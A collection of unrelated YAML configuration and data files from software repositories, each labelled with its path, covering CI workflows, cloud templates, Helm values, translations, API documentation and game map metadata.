eyJjb2RlIjoyMDAsInN0YXR1cyI6Ik9rIiwiY29weXJpZ2h0IjoiwqkgMjAx
NyBNQVJWRUwiLCJhdHRyaWJ1dGlvblRleHQiOiJEYXRhIHByb3ZpZGVkIGJ5
IE1hcnZlbC4gwqkgMjAxNyBNQVJWRUwiLCJhdHRyaWJ1dGlvbkhUTUwiOiI8
YSBocmVmPVwiaHR0cDovL21hcnZlbC5jb21cIj5EYXRhIHByb3ZpZGVkIGJ5
IE1hcnZlbC4gwqkgMjAxNyBNQVJWRUw8L2E+IiwiZXRhZyI6ImZhZTY3NDVj
Njc5NmFkZTViMDkwYjdiODNhNzcwMmVlYjc1MGI0ZWIiLCJkYXRhIjp7Im9m
ZnNldCI6MCwibGltaXQiOjEsInRvdGFsIjo4NzQ3NSwiY291bnQiOjEsInJl
c3VsdHMiOlt7ImlkIjo3LCJ0aXRsZSI6IkludmVzdGlnYXRpbmcgdGhlIG11
cmRlciBvZiBhIHRlZW5hZ2UgZ2lybCwgQ2FnZSBzdWRkZW5seSBsZWFybnMg
dGhhdCBhIHRocmVlLXdheSBnYW5nIHdhciBpcyB1bmRlciB3YXkgZm9yIGNv
bnRyb2wgb2YgdGhlIHR1cmYiLCJkZXNjcmlwdGlvbiI6IiIsInJlc291cmNl
VVJJIjoiaHR0cDovL2dhdGV3YXkubWFydmVsLmNvbS92MS9wdWJsaWMvc3Rv
cmllcy83IiwidHlwZSI6InN0b3J5IiwibW9kaWZpZWQiOiIxOTY5LTEyLTMx
VDE5OjAwOjAwLTA1MDAiLCJ0aHVtYm5haWwiOm51bGwsImNyZWF0b3JzIjp7
ImF2YWlsYWJsZSI6MCwiY29sbGVjdGlvblVSSSI6Imh0dHA6Ly9nYXRld2F5
Lm1hcnZlbC5jb20vdjEvcHVibGljL3N0b3JpZXMvNy9jcmVhdG9ycyIsIml0
ZW1zIjpbXSwicmV0dXJuZWQiOjB9LCJjaGFyYWN0ZXJzIjp7ImF2YWlsYWJs
ZSI6MCwiY29sbGVjdGlvblVSSSI6Imh0dHA6Ly9nYXRld2F5Lm1hcnZlbC5j
b20vdjEvcHVibGljL3N0b3JpZXMvNy9jaGFyYWN0ZXJzIiwiaXRlbXMiOltd
LCJyZXR1cm5lZCI6MH0sInNlcmllcyI6eyJhdmFpbGFibGUiOjEsImNvbGxl
Y3Rpb25VUkkiOiJodHRwOi8vZ2F0ZXdheS5tYXJ2ZWwuY29tL3YxL3B1Ymxp
Yy9zdG9yaWVzLzcvc2VyaWVzIiwiaXRlbXMiOlt7InJlc291cmNlVVJJIjoi
aHR0cDovL2dhdGV3YXkubWFydmVsLmNvbS92MS9wdWJsaWMvc2VyaWVzLzYi
LCJuYW1lIjoiQ2FnZSBWb2wuIEkgKDIwMDIpIn1dLCJyZXR1cm5lZCI6MX0s
ImNvbWljcyI6eyJhdmFpbGFibGUiOjEsImNvbGxlY3Rpb25VUkkiOiJodHRw
Oi8vZ2F0ZXdheS5tYXJ2ZWwuY29tL3YxL3B1YmxpYy9zdG9yaWVzLzcvY29t
aWNzIiwiaXRlbXMiOlt7InJlc291cmNlVVJJIjoiaHR0cDovL2dhdGV3YXku
bWFydmVsLmNvbS92MS9wdWJsaWMvY29taWNzLzk0MSIsIm5hbWUiOiJDYWdl
IFZvbC4gSSAoSGFyZGNvdmVyKSJ9XSwicmV0dXJuZWQiOjF9LCJldmVudHMi
OnsiYXZhaWxhYmxlIjowLCJjb2xsZWN0aW9uVVJJIjoiaHR0cDovL2dhdGV3
YXkubWFydmVsLmNvbS92MS9wdWJsaWMvc3Rvcmllcy83L2V2ZW50cyIsIml0
ZW1zIjpbXSwicmV0dXJuZWQiOjB9LCJvcmlnaW5hbElzc3VlIjp7InJlc291
cmNlVVJJIjoiaHR0cDovL2dhdGV3YXkubWFydmVsLmNvbS92MS9wdWJsaWMv
Y29taWNzL<KEY>9
fV19fQ==
http_version:
recorded_at: Sat, 01 Jan 2000 00:00:00 GMT
recorded_with: VCR 3.0.3
|
spec/vcr/stories.yml
|
name: Build and Publish Images
on:
schedule:
- cron: '0 0 * * 3' # build and publish images every Wednesday
push:
branches:
- main
jobs:
publish-base-image:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: dorny/paths-filter@v2.1.0
if: github.event_name == 'push'
id: filter
with:
filters: '.github/filters.yml'
- name: Docker login
if: ${{ github.event_name == 'schedule' || steps.filter.outputs.base_image == 'true' }}
run: echo "$DOCKER_TOKEN" | docker login --username=$DOCKER_USER --password-stdin
env:
DOCKER_USER: ${{ secrets.DOCKER_USER }}
DOCKER_TOKEN: ${{ secrets.DOCKER_TOKEN }}
- name: Build and publish android-sdk-base.Dockerfile
if: ${{ github.event_name == 'schedule' || steps.filter.outputs.base_image == 'true' }}
run: sh publish_android_sdk_base_image.sh
publish-sdk-image:
needs: publish-base-image
runs-on: ubuntu-latest
strategy:
matrix:
api-level: [21, 22, 23, 24, 25, 26, 27, 28, 29, 30]
steps:
- uses: actions/checkout@v2
- uses: dorny/paths-filter@v2.1.0
if: github.event_name == 'push'
id: filter
with:
filters: '.github/filters.yml'
- name: Docker login
if: ${{ github.event_name == 'schedule' || steps.filter.outputs.base_image == 'true' || steps.filter.outputs.sdk_images == 'true' }}
run: echo "$DOCKER_TOKEN" | docker login --username=$DOCKER_USER --password-stdin
env:
DOCKER_USER: ${{ secrets.DOCKER_USER }}
DOCKER_TOKEN: ${{ secrets.DOCKER_TOKEN }}
- name: Build and publish android-sdk-${{ matrix.api-level }}.Dockerfile
if: ${{ github.event_name == 'schedule' || steps.filter.outputs.base_image == 'true' || steps.filter.outputs.sdk_images == 'true' }}
run: sh publish_android_sdk_image.sh ${{ matrix.api-level }}
publish-emulator-image:
needs: publish-sdk-image
runs-on: ubuntu-latest
strategy:
matrix:
api-level: [21, 22, 23, 24, 25, 26, 27, 28, 29, 30]
steps:
- uses: actions/checkout@v2
- uses: dorny/paths-filter@v2.1.0
if: github.event_name == 'push'
id: filter
with:
filters: '.github/filters.yml'
- name: Docker login
if: ${{ github.event_name == 'schedule' || steps.filter.outputs.base_image == 'true' || steps.filter.outputs.sdk_images == 'true' || steps.filter.outputs.emulator_images == 'true' }}
run: echo "$DOCKER_TOKEN" | docker login --username=$DOCKER_USER --password-stdin
env:
DOCKER_USER: ${{ secrets.DOCKER_USER }}
DOCKER_TOKEN: ${{ secrets.DOCKER_TOKEN }}
- name: Build and publish android-emulator-${{ matrix.api-level }}.Dockerfile
if: ${{ github.event_name == 'schedule' || steps.filter.outputs.base_image == 'true' || steps.filter.outputs.sdk_images == 'true' || steps.filter.outputs.emulator_images == 'true' }}
run: sh publish_android_emulator_image.sh ${{ matrix.api-level }}
|
.github/workflows/build-and-publish-images.yml
|
metadata:
title: Flushright
documentation: "http://docassemble.org/docs/documents.html#metadata rtf pdf"
---
mandatory: true
question: |
Here is your document.
subquestion: |
It demonstrates the flush right environment.
attachments:
- name: A test document
filename: test_document
metadata:
FirstHeaderLeft: Test me test me
FirstHeaderCenter: Test me test me
FirstHeaderRight: |
Example, LLP [BR]
124 Main Street, Suite 1500 [BR]
Philadelphia, PA 19102
HeaderLeft: Test me test me
HeaderCenter: Test me test me
HeaderRight: |
Example, LLP [BR]
123--24 Main Street, Suite 1500 [BR]
Philadelphia, PA 19102
FirstFooterLeft: Test me test me
FirstFooterCenter: Test me test me
FirstFooterRight: |
Example, LLP [BR]
124 Main Street, _Suite_ 1500 [BR]
Philadelphia, PA 19102
FooterLeft: Test me test me
FooterCenter: Test me test me
FooterRight: |
Example, LLP [BR]
123 Main Street, Suite 1500 [BR]
Philadelphia, PA 19102
SingleSpacing: true
content: |
This "line" is to the left.
This line is "also" to the left.
[FLUSHRIGHT] This line is "flush" right. [NEWLINE] So is _this_ line.
[INDENTBY 1in] [BORDER] This **line** is indented. [NEWLINE] So is this line.
[BORDER] [INDENTBY 2in 1in] This is a very "confined" paragraph
that is not to be taken lightly---because it's so absolutely
constrained beyond any belief or any person's imagination in the
whole wide world under the sun and the moon and the barn down
the street.
fruit| price
-----|-----:
apple|2.05
pear|1.37
orange|3.09
Lorem ipsum "dolor" sit amet from 1--2, consectetur adipiscing elit. Nunc
quis odio a dolor rhoncus elementum ut sed ex. Lorem ipsum dolor
sit amet, consectetur adipiscing elit. Aenean blandit massa nec
ante rutrum, nec interdum ipsum auctor. Pellentesque posuere
rhoncus pulvinar. Cras rutrum---if I may say---tellus sit amet elit euismod, quis
viverra metus dignissim. Aenean id convallis eros. Vestibulum
tristique, erat non ornare rhoncus, lectus urna consectetur
urna, sit amet rhoncus magna est a orci. Sed sed euismod tortor.
[BORDER] Aliquam nec turpis massa. Integer non vulputate nibh. Integer mi
justo, sagittis eget erat quis, porta auctor purus. Quisque ac
rutrum nibh. Duis id massa faucibus, facilisis mauris sit amet,
congue nisl. Duis vel odio vehicula, sodales tellus ut, tempor
ipsum. Morbi tempor aliquam gravida. Aliquam tortor est,
tincidunt sed libero et, vehicula ullamcorper tellus. Curabitur
quis magna erat. Vivamus euismod gravida ante, eu congue arcu
ultricies ac. Praesent porta euismod urna non sodales.
[NEWPAR]
Phasellus orci diam, sodales a elementum ac, gravida sit amet
erat. Nunc imperdiet malesuada magna, nec laoreet tortor dapibus
in. Praesent nulla elit, rhoncus vitae tincidunt non, rutrum ut
justo. Suspendisse aliquam sollicitudin porttitor. In suscipit,
magna sit amet eleifend iaculis, nisl elit sodales diam, dapibus
rutrum odio augue sed velit. Ut ullamcorper, quam at dapibus
hendrerit, nibh libero vulputate massa, non pretium nisl libero
at enim. Donec vestibulum sapien purus, et mattis nunc ultricies
non. Morbi velit lacus, ornare a lectus sed, auctor accumsan
ante. Donec imperdiet quis velit non varius. Suspendisse in
ultricies massa, id venenatis arcu.
In vitae erat luctus urna rutrum convallis et id nibh. Fusce
suscipit lacus at ligula mattis, vitae maximus nunc
ultrices. Praesent pellentesque nulla sem. Donec rhoncus leo
velit. Ut nec dui accumsan, commodo elit ac, maximus
lacus. Curabitur malesuada tortor augue, quis mattis augue
aliquet vel. Mauris gravida orci at neque dictum
scelerisque. Quisque turpis quam, dignissim ut augue quis,
euismod placerat nisi. Donec convallis mollis varius. Fusce
posuere rutrum risus vel porta. Curabitur erat diam, semper vel
condimentum vitae, fringilla non neque. Etiam nec nunc id est
pharetra dignissim. Nam condimentum nibh sit amet erat mattis
suscipit vitae vel eros. Donec eu pellentesque arcu, vitae
euismod tortor. Aliquam accumsan nulla aliquam diam ultricies
venenatis.
Cras mattis tellus neque, ut congue mi scelerisque eget. Cras
finibus tincidunt augue, ut rutrum risus vehicula vel. Praesent
fermentum tortor posuere feugiat interdum. Ut turpis arcu,
sagittis vitae odio vel, gravida cursus urna. Suspendisse
dignissim tortor id iaculis tincidunt. Nulla
facilisi. Suspendisse lacinia nisl interdum, egestas turpis non,
fringilla felis.
|
docassemble_base/docassemble/base/data/questions/examples/flushright.yml
|
en:
created: "Published on the"
author: "by"
description: "Bitcoin Core website"
footer: "Bitcoin Core project"
related: "Recommended"
viewallposts: "View all posts"
not_translated: "Note: this page has not been translated"
tocoverview: "Overview"
translation_outdated: "This translation may be out of date. Please compare with the English version."
rss_feed: "Bitcoin Core Blog RSS Feed"
rss_meetings_feed: "Meetings feed"
rss_blog_feed: "Blog posts feed"
zh_CN:
created: "发布在"
  author: "由"
description: "比特币核心网站"
footer: "比特币核心项目"
  related: "推荐"
viewallposts: "查看所有帖子"
not_translated: "注:该页尚未被翻译"
tocoverview: "总览"
  translation_outdated: "这段翻译可能已过期。请对照英文原版。"
rss_feed: "Bitcoin Core Blog RSS Feed"
rss_meetings_feed: "Meetings feed"
rss_blog_feed: "Blog posts feed"
zh_TW:
created: "發表於"
author: "作者"
description: "Bitcoin Core 網站"
footer: "Bitcoin Core 計劃"
  related: "推薦閱讀"
  viewallposts: "顯示所有文章"
not_translated: "注意:本頁未被翻譯"
tocoverview: "Overview"
translation_outdated: "This translation may be out of date compared to the English version"
rss_feed: "Bitcoin Core Blog RSS Feed"
rss_meetings_feed: "Meetings feed"
rss_blog_feed: "Blog posts feed"
ja:
created: "Published on the"
author: "by"
description: "Bitcoin Core ウェブサイト"
footer: "Bitcoin Core プロジェクト"
related: "Recommended"
viewallposts: "すべての投稿を見る"
not_translated: "注意: このページは翻訳されていません"
tocoverview: "Overview"
translation_outdated: "この翻訳は古くなっている可能性があります。英語版と比較してください。"
rss_feed: "Bitcoin Core Blog RSS Feed"
rss_meetings_feed: "Meetings feed"
rss_blog_feed: "Blog posts feed"
es:
created: "Publicado el"
author: "por"
description: "Sitio web de Bitcoin Core"
footer: "Proyecto Bitcoin Core"
related: "Recomendado"
viewallposts: "Ver todas las publicaciones"
not_translated: "Nota: esta página no ha sido traducida"
tocoverview: "Resumen"
translation_outdated: "Esta traducción podría estar obsoleta. Por favor compárela con la versión inglesa."
rss_feed: "Fuente RSS del Blog de Bitcoin Core"
rss_meetings_feed: "Feed de reuniones"
rss_blog_feed: "Feed de entradas del blog"
|
_data/translations.yml
|
Resources:
ClientDistribution:
Type: AWS::CloudFront::Distribution
DependsOn:
- ClientBucketResource
- ClientLoggingBucketResource
Properties:
DistributionConfig:
Origins:
- Id: !Ref TargetOriginId
DomainName:
!Select [2, !Split ['/', !GetAtt ClientBucketResource.WebsiteURL]]
OriginPath: ''
CustomOriginConfig:
HTTPPort: 80
HTTPSPort: 443
OriginProtocolPolicy: http-only
Enabled: true
# For a custom domain
Aliases:
- !Ref DomainName
HttpVersion: http2
Comment: CDN for static website
# PriceClass: 'PriceClass_100'
PriceClass: PriceClass_All
DefaultRootObject: index.html
## Since the Single Page App is taking care of the routing we need to make sure ever path is served with index.html
## The only exception are files that actually exist e.h. app.js, reset.css
CustomErrorResponses:
- ErrorCode: 403
ResponseCode: 200
ResponsePagePath: !Ref CustomErrorResponsePagePath
- ErrorCode: 404
ResponseCode: 200
ResponsePagePath: !Ref CustomErrorResponsePagePath
DefaultCacheBehavior:
AllowedMethods:
# - DELETE
- GET
- HEAD
- OPTIONS
# - PATCH
# - POST
# - PUT
Compress: true
## The origin id defined above
TargetOriginId: !Ref TargetOriginId
## Defining if and how the QueryString and Cookies are forwarded to the origin which in this case is S3
ForwardedValues:
QueryString: true
Cookies:
Forward: none
## The protocol that users can use to access the files in the origin. To allow HTTP use `allow-all`
ViewerProtocolPolicy: redirect-to-https
## The certificate to use when viewers use HTTPS to request objects.
ViewerCertificate:
SslSupportMethod: sni-only
AcmCertificateArn: !Ref ClientDistributionCertificate
Logging:
IncludeCookies: true
Bucket: !GetAtt ClientLoggingBucketResource.DomainName
Prefix: ''
|
resources/cf-distribution.yml
|
description: SSM Automation Setup
schemaVersion: '0.3'
parameters:
"Name":
"default": "ssmdocument"
"type": "String"
"description": "(Optional) CloudFormation StackName."
mainSteps:
- name: deleteStack
action: aws:deleteStack
onFailure: Continue
inputs:
StackName: "{{Name}}-setup"
- name: createStack
action: aws:createStack
inputs:
StackName: "{{Name}}-setup"
Capabilities: [ "CAPABILITY_NAMED_IAM" ]
TemplateBody: |
Description: "SSM Automation Setup"
Parameters:
LinuxLatestAmiId:
Type: 'AWS::SSM::Parameter::Value<AWS::EC2::Image::Id>'
Default: "/aws/service/ami-amazon-linux-latest/amzn-ami-hvm-x86_64-gp2"
WindowsLatestAmiId:
Type: 'AWS::SSM::Parameter::Value<AWS::EC2::Image::Id>'
Default: "/aws/service/ami-windows-latest/Windows_Server-2012-R2_RTM-English-64Bit-Base"
Resources:
TestRole:
Type : AWS::IAM::Role
Properties:
RoleName: "{{Name}}"
AssumeRolePolicyDocument:
Version: "2012-10-17"
Statement:
- Effect: "Allow"
Principal:
Service:
- "ec2.amazonaws.com"
- "ssm.amazonaws.com"
Action: "sts:AssumeRole"
ManagedPolicyArns:
- "arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM"
- "arn:aws:iam::aws:policy/CloudWatchAgentServerPolicy"
- "arn:aws:iam::aws:policy/AmazonSSMFullAccess"
IamInstanceProfile:
Type: "AWS::IAM::InstanceProfile"
Properties:
InstanceProfileName: "{{Name}}"
Roles:
- !Ref TestRole
LinuxEC2Instance1:
Type: "AWS::EC2::Instance"
Properties:
ImageId: !Ref LinuxLatestAmiId
InstanceType: "t2.micro"
IamInstanceProfile: !Ref IamInstanceProfile
Tags:
- Key: "Name"
Value: "{{Name}}-linux"
LinuxEC2Instance2:
Type: "AWS::EC2::Instance"
Properties:
ImageId: !Ref LinuxLatestAmiId
InstanceType: "t2.micro"
IamInstanceProfile: !Ref IamInstanceProfile
Tags:
- Key: "Name"
Value: "{{Name}}-linux"
LinuxAssociation1:
Type: "AWS::SSM::Association"
Properties:
AssociationName: "Linux-RunPatchBaseline"
Name: "AWS-RunPatchBaseline"
ScheduleExpression: "cron(0 2 0 ? * SUN *)"
Targets:
- Key: tag:Name
Values: ["{{Name}}-linux"]
Parameters:
Operation: [ "Install" ]
WindowsEC2Instance1:
Type: "AWS::EC2::Instance"
Properties:
ImageId: !Ref WindowsLatestAmiId
InstanceType: "t2.micro"
IamInstanceProfile: !Ref IamInstanceProfile
Tags:
- Key: "Name"
Value: "{{Name}}-windows"
WindowsAssociation1:
Type: "AWS::SSM::Association"
Properties:
AssociationName: "Windows-RunPatchBaseline"
Name: "AWS-RunPatchBaseline"
ScheduleExpression: "cron(0 2 0 ? * SUN *)"
Targets:
- Key: tag:Name
Values: ["{{Name}}-windows"]
Parameters:
Operation: [ "Install" ]
Association1:
Type: "AWS::SSM::Association"
Properties:
AssociationName: "GatherSoftwareInventory"
Name: "AWS-GatherSoftwareInventory"
ScheduleExpression: "rate(30 minutes)"
Targets:
- Key: InstanceIds
Values: ["*"]
Association2:
Type: "AWS::SSM::Association"
Properties:
AssociationName: "UpdateSSMAgentDaily"
Name: "AWS-UpdateSSMAgent"
ScheduleExpression: "rate(1 day)"
Targets:
- Key: tag:Name
Values: ["{{Name}}-linux", "{{Name}}-windows"]
outputs:
- "createStack.StackId"
- "createStack.StackStatus"
- "createStack.StackStatusReason"
|
AWS/ssm/documents/00 Setup.yaml
|
items:
- uid: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes"
id: "WithNumberOfProbes"
parent: "com.microsoft.azure.management.network"
children:
- "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes(int)"
langs:
- "java"
name: "LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes"
nameWithType: "LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes"
fullName: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes"
type: "Interface"
package: "com.microsoft.azure.management.network"
summary: "The stage of the TCP probe update allowing to modify the number of unsuccessful probes before failure is determined."
syntax:
content: "public static interface LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes"
- uid: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes(int)"
id: "withNumberOfProbes(int)"
parent: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes"
langs:
- "java"
name: "withNumberOfProbes(int probes)"
nameWithType: "LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes(int probes)"
fullName: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes(int probes)"
overload: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes*"
type: "Method"
package: "com.microsoft.azure.management.network"
summary: "Specifies the number of unsuccessful probes before failure is determined."
syntax:
content: "public abstract LoadBalancerTcpProbe.Update withNumberOfProbes(int probes)"
parameters:
- id: "probes"
type: "int"
description: "number of probes"
return:
type: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.Update"
description: "the next stage of the update"
references:
- uid: "int"
spec.java:
- uid: "int"
name: "int"
fullName: "int"
- uid: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.Update"
name: "LoadBalancerTcpProbe.Update"
nameWithType: "LoadBalancerTcpProbe.Update"
fullName: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.Update"
- uid: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes*"
name: "withNumberOfProbes"
nameWithType: "LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes"
fullName: "com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.withNumberOfProbes"
package: "com.microsoft.azure.management.network"
|
docs-ref-autogen/com.microsoft.azure.management.network.LoadBalancerTcpProbe.UpdateStages.WithNumberOfProbes.yml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2018-10-16 18:34"
game: "Unreal Tournament"
name: "CTF-RoadKill"
author: "Chris 'Sett' Montrose"
description: "Please look both ways when crossing the street."
releaseDate: "2002-06"
attachments:
- type: "IMAGE"
name: "CTF-RoadKill_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/Capture%20The%20Flag/R/CTF-RoadKill_shot_1.png"
originalFilename: "ctf-roadkill-final.zip"
hash: "340837050254ce940ddc6659dc5818b9cae1aaea"
fileSize: 3878688
files:
- name: "CTF-RoadKill.unr"
fileSize: 3541983
hash: "3c22006e21c08a1532e56efe6466cf61a0f64c5f"
- name: "RoadKIll.utx"
fileSize: 1129303
hash: "ce734b8fdacab9ac3db32b08670ca524a15c0114"
- name: "RoadKill2.utx"
fileSize: 2346023
hash: "5766f88ff514a022b2201aeadcbb729559adf45a"
- name: "RoadKill_M.u"
fileSize: 3651
hash: "97c27c2083e8d49298986d896d1d78d1eec7c443"
- name: "RoadKIll.u"
fileSize: 1017492
hash: "e6adc85788c41a64d2f806a637cb615a612845e2"
otherFiles: 1
dependencies:
CTF-RoadKill.unr:
- status: "OK"
name: "RoadKIll"
- status: "OK"
name: "RoadKill2"
- status: "OK"
name: "RoadKill_M"
RoadKill_M.u:
- status: "OK"
name: "RoadKill2"
downloads:
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/Capture%20The%20Flag/R/ctf-roadkill-final.zip"
main: true
repack: false
state: "OK"
- url: "http://www.ut-files.com/index.php?dir=Maps/CTF/MapsR/&file=ctf-roadkill-final.zip"
main: false
repack: false
state: "OK"
- url: "http://medor.no-ip.org/index.php?dir=Maps/CTF&file=ctf-roadkill-final.zip"
main: false
repack: false
state: "OK"
- url: "http://uttexture.com/UT/Downloads/Maps/CTF/MapsR/ctf-roadkill-final.zip"
main: false
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Maps/Capture%20The%20Flag/R/3/4/083705/ctf-roadkill-final.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Maps/Capture%20The%20Flag/R/3/4/083705/ctf-roadkill-final.zip"
main: false
repack: false
state: "OK"
deleted: false
gametype: "Capture The Flag"
title: "CTF-Roadkill"
playerCount: "2-22"
themes:
City: 1.0
bots: true
|
content/Unreal Tournament/Maps/Capture The Flag/R/3/4/083705/ctf-roadkill_[34083705].yml
|
payload:
- DOMAIN-SUFFIX,apecn.com
- DOMAIN-SUFFIX,china-ceec-cooperation.com
- DOMAIN-SUFFIX,china.com
- DOMAIN-SUFFIX,chinabroadcast.cn
- DOMAIN-SUFFIX,chinamwh.com
- DOMAIN-SUFFIX,chinaradio.cn
- DOMAIN-SUFFIX,chinesecity.com.cn
- DOMAIN-SUFFIX,chinesefilms.cn
- DOMAIN-SUFFIX,chineseradio.cn
- DOMAIN-SUFFIX,chineseradio.com.cn
- DOMAIN-SUFFIX,cibn-intl.com
- DOMAIN-SUFFIX,cibn.cc
- DOMAIN-SUFFIX,cibnlive.cn
- DOMAIN-SUFFIX,cibnlive.com
- DOMAIN-SUFFIX,cibnott.net
- DOMAIN-SUFFIX,cibntv.net
- DOMAIN-SUFFIX,cri-grandera.com
- DOMAIN-SUFFIX,cri-on.com
- DOMAIN-SUFFIX,cri.cn
- DOMAIN-SUFFIX,cri.com.cn
- DOMAIN-SUFFIX,criankara.com
- DOMAIN-SUFFIX,criarabic.com
- DOMAIN-SUFFIX,criberlin.com
- DOMAIN-SUFFIX,cribsas.com
- DOMAIN-SUFFIX,crichinese.cn
- DOMAIN-SUFFIX,cricr.cn
- DOMAIN-SUFFIX,cricz.cn
- DOMAIN-SUFFIX,crieasyfm.com
- DOMAIN-SUFFIX,crienglish.com
- DOMAIN-SUFFIX,criezfm.cn
- DOMAIN-SUFFIX,criezfm.com
- DOMAIN-SUFFIX,crilondon.com
- DOMAIN-SUFFIX,crimoscow.com
- DOMAIN-SUFFIX,crinewsradio.cn
- DOMAIN-SUFFIX,crinihaochina.com
- DOMAIN-SUFFIX,crionline.cn
- DOMAIN-SUFFIX,cririo.com
- DOMAIN-SUFFIX,criseoul.com
- DOMAIN-SUFFIX,crisydney.com
- DOMAIN-SUFFIX,critokyo.com
- DOMAIN-SUFFIX,criwashington.com
- DOMAIN-SUFFIX,discoverplusradio.cn
- DOMAIN-SUFFIX,discoverplusradio.com.cn
- DOMAIN-SUFFIX,globalfm.cn
- DOMAIN-SUFFIX,guotv.com
- DOMAIN-SUFFIX,guotv.com.cn
- DOMAIN-SUFFIX,gvmedia.com.cn
- DOMAIN-SUFFIX,hitfm.cn
- DOMAIN-SUFFIX,huawangzhixun.com
- DOMAIN-SUFFIX,imgcdc.com
- DOMAIN-SUFFIX,inetradio.cn
- DOMAIN-SUFFIX,itaiwannews.cn
- DOMAIN-SUFFIX,musicplusradio.cn
- DOMAIN-SUFFIX,newsplusradio.cn
- DOMAIN-SUFFIX,nihaotv.net
- DOMAIN-SUFFIX,novotrail.com
- DOMAIN-SUFFIX,novotrails.com
- DOMAIN-SUFFIX,primeplusradio.cn
- DOMAIN-SUFFIX,readingchinese.cn
- DOMAIN-SUFFIX,silkroddream.com
- DOMAIN-SUFFIX,silktrek.com
- DOMAIN-SUFFIX,sinorusfocus.com
- DOMAIN-SUFFIX,sinorussian21st.org
- DOMAIN-SUFFIX,starschina.cn
- DOMAIN-SUFFIX,starschina.com
- DOMAIN-SUFFIX,starschina.com.cn
- DOMAIN-SUFFIX,starschinalive.com
- DOMAIN-SUFFIX,temyee.com
- DOMAIN-SUFFIX,vdnplus.cn
- DOMAIN-SUFFIX,vdnplus.com
- DOMAIN-SUFFIX,vdnplus.net
|
rules/blackmatrix7/CIBN/CIBN.yaml
|
# Docker image to use for deployment
image:
repository: "severalnines/proxysql"
tag: "2.0.15"
# Default number of ProxySQL replicas
numReplicas: 2
terminationGracePeriodSeconds: 30
# Default admin username
proxysql:
admin:
username: admin
password: <PASSWORD>
# Connect on this port to administer ProxySQL, view stats, etc.
iface: "0.0.0.0"
port: 6032
clusterAdmin:
username: clusteradmin
password: <PASSWORD>
# Query Cache Size
# queryCacheSizeMb: 256
# ProxySQL needs a cluster name
dataDir: "/var/lib/proxysql"
webEnabled: true
monitorConfigChange: false
additionConfig: |
mysql_servers =
(
{ address="mysql_server_0.headless_service.namespace.svc.cluster.local", port=3306 , hostgroup=10, max_connections=500 },
{ address="mysql_server_1.headless_service.namespace.svc.cluster.local", port=3306 , hostgroup=10, max_connections=500 },
{ address="mysql_server_2.headless_service.namespace.svc.cluster.local", port=3306 , hostgroup=10, max_connections=500 }
)
mysql_galera_hostgroups =
(
{
writer_hostgroup=10
backup_writer_hostgroup=20
reader_hostgroup=30
offline_hostgroup=9999
max_writers=1
writer_is_also_reader=1
max_transactions_behind=30
active=1
}
)
mysql_users =
(
{ username = "root" , password = "<PASSWORD>" , default_hostgroup = 10 ,transaction_persistent = 0, active = 1 }
)
mysql_query_rules =
(
{
rule_id=100
active=1
match_pattern="^SELECT .* FOR UPDATE"
destination_hostgroup=10
apply=1
},
{
rule_id=200
active=1
match_pattern="^SELECT .*"
destination_hostgroup=30
apply=1
},
{
rule_id=300
active=1
match_pattern=".*"
destination_hostgroup=10
apply=1
}
)
# MySQL Settings
mysql:
# Applications connect on this port to run queries
iface: "0.0.0.0"
port: 3306
version: "8.0.19-10"
# This is the monitor user, just needs usage rights on the databases
monitor:
username: root
password: <PASSWORD>
admin:
username: root
password: <PASSWORD>
lifecycle:
preStop:
exec:
command: ["/bin/sh", "-c", "sleep 5"]
# Hard means that by default pods will only be scheduled if there are enough nodes for them
# and that they will never end up on the same node. Setting this to soft will do this "best effort"
antiAffinity: "soft"
# Only used if you choose soft
weight: 1
antiAffinityTopologyKey: "kubernetes.io/hostname"
# Resource requests and limits
resources: {}
# Optional tolerations
tolerations: {}
|
charts/proxysql/values.yaml
|
version: '3'
services:
ccd-elasticsearch:
image: docker.elastic.co/elasticsearch/elasticsearch:6.4.2
container_name: ccd-elasticsearch
depends_on:
- "ccd-data-store-api"
environment:
- cluster.name=ccd-docker-es-cluster
- discovery.type=single-node
- bootstrap.memory_lock=true
- action.auto_create_index=.security*,.watches,.triggered_watches,.watcher-history-*,.logstash_dead_letter,.ml*,grantofrepresentation_cases,caveat_cases,legacy_cases,standingsearch_cases,willlodgement_cases
- "ES_JAVA_OPTS=-Xms512m -Xmx512m"
ulimits:
memlock:
soft: -1
hard: -1
volumes:
- esdata1:/usr/share/elasticsearch/data
ports:
- 9200:9200
networks:
- compose_default
ccd-logstash:
image: "ccd-logstash:probate"
container_name: ccd-logstash
depends_on:
- "ccd-elasticsearch"
environment:
- XPACK_MONITORING_ENABLED=false
- DB_URL=jdbc:postgresql://ccd-shared-database:5432/ccd_data?stringtype=unspecified&ssl=false
- DB_USER=ccd
